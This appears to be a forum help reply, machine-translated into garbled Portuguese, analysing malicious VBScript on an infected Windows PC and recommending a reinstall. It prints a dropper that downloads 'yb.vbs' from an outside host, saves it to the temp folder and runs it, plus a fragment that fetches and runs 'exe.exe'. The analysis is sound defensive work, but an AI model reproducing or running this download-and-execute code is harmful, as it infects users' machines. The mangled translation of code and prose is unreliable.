Eu não sou disposto ir até a abertura dos Web site que você mencionou entretanto, dos certificados acima sou aqui o que eu ver…
O certificado 1 está criando uma lima em branco, as ligações a um Web site e a transferências o índice da página e as descargas ele na lima em branco. Esta lima é conservada como “yb.vbs” e supor executar.
-------------------------------------------------------------------
B= " yb.vbs "
Com CreateObject (“MSXML2.XMLHTTP
”)
.open “COMEÇ”, “
http://jyiop.com/kr/yb.vbs”, falso
.send ()
Ajustar A = CreateObject (“Scripting.FileSystemObject
”)
Ajustar D = A.CreateTextFile (A.GetSpecialFolder
(
2) + “\” + B)
D.WriteLine .responseText
Extremidade com
D.Close
CreateObject (“WScript.Shell
”). Funcionar A.GetSpecialFolder (2) +” \ “+ B
-------------------------------------------------------------------
Etapa 2 agora que a lima dos vbs foi criada e funcionamento, tenta visitar um outro Web page mas esta vez conserva o índice do Web page em uma lima chamada “exe.exe”. Esta lima nova deve ser conservado no dobrador do temp dos usuários.
O certificado funciona então a lima “exe.exe”.
Como você mencionou, o taskkill para Windows Media Player - porque, que sabe?!?!
O certificado suprime então do certificado do vb que etapa 1 criou (o certificado que está funcionando atualmente).
Há uma segundo espera 3 a lima “exe.exe” é suprimida então que.
Esta parte;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Se c.Status = x então
u=c.ResponseBody: d.Open: d.Type
= y: d.Write u: d.SaveToFile b: d.Close]
é o certificado que datilografa para abrir uma lima que flua no Web page - nada fazer com Adobe. “c.Status” - o certificado está esperando o Web page para ser pronto e cabido para transferir. “u=c.ResponseBody” toma o Web page e shoves o em uma variável. O córrego é aberto e o texto é transferido na variável. A lima é conservada e fechado. Neste certificado o Web page/lima é conservado no dobrador do temp como “exe.exe”.
O perigo real é que lima de “exe.exe”. Uma vez que foi funcionado, não se pode dizer o que foi projetado fazer.
Esse computador é contaminado ainda com um vírus. O programa “exe.exe” poderia ter transferido outros vírus no fundo para impedir varreduras do sistema. O fato de que você pode ver a janela do comando aberta e o certificado são tentados funcionar dizem-me que há alguma lima maliciosa ainda que se atrasa.
Pode ser hora de avaliar que necessidades de ser conservado dessa máquina e começar novamente com uma reinstalação de Windows e de aplicações. Soa dramático mas vendo como o antivirus não está detetando qualquer coisa fora das sortes mim pensar que você está no ponto de nenhum retorno. Recordar isso contanto que o código malicioso estiver ligada lá, algum conduzem; é a vara da memória do USB, a câmera etc., pode potencial conter o vírus/Trojan, se foi unido à máquina.
